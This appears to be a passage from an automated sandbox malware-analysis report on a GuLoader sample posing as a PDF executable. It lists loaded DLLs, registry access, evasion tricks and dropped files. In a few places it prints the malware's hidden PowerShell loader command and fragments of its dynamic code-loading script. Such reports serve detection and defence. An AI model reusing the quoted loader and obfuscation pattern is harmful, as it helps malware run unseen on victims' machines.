Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Section loaded: secur32.dll	Jump to behavior

Source: C:\Users\user\Desktop\678763_PDF.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: 678763_PDF.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: %^qm.Core.pdb source: powershell.exe, 00000001.00000002.2154422416.00000000080F2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: stem.Core.pdbL source: powershell.exe, 00000001.00000002.2154422416.00000000080F2000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000001.00000002.2156462288.000000000A4F3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((hardhacks $Srloves17 $Vermifuge), (Smedejernet @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Denethor = [AppDomain]::CurrentDomain.GetAssemblies()$global
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Betragtningers)), $Mineralize).DefineDynamicModule($Kallun, $false).DefineType($Glaikitness, $Reweaves, [System.MulticastDelegate])$Bi

Suspicious powershell command line found

Source: C:\Users\user\Desktop\678763_PDF.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Epigraphic93=gc -raw 'C:\Users\user\AppData\Roaming\erstatningsgraden\Internist\Hyperimmune.Mus';$Miljerne=$Epigraphic93.SubString(70004,3);.$Miljerne($Epigraphic93) "
Source: C:\Users\user\Desktop\678763_PDF.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Epigraphic93=gc -raw 'C:\Users\user\AppData\Roaming\erstatningsgraden\Internist\Hyperimmune.Mus';$Miljerne=$Epigraphic93.SubString(70004,3);.$Miljerne($Epigraphic93) "			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_043029A1 push cs; retf 0007h	1_2_043029A2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_043029C0 push cs; retf 0007h	1_2_043029C2
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Code function: 6_3_0019CA98 pushfd ; retf 0019h	6_3_0019CA99
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Code function: 6_3_0019EE18 push eax; iretd	6_3_0019EE65
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Code function: 6_3_0019EE8C push eax; iretd	6_3_0019EEA9
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Code function: 6_3_0019CF4C push eax; iretd	6_3_0019CF4D
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Code function: 6_2_00159C30 push esp; retf 0017h	6_2_00159D55

Source: C:\Users\user\Desktop\678763_PDF.exe	File created: C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp\nsExec.dll			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe			Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\678763_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe

API/Special instruction interceptor: Address: 2D2630E

Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Memory allocated: 110000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Memory allocated: 20BD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Memory allocated: 20960000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 599641	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 599516	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 599406	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 599297	Jump to behavior
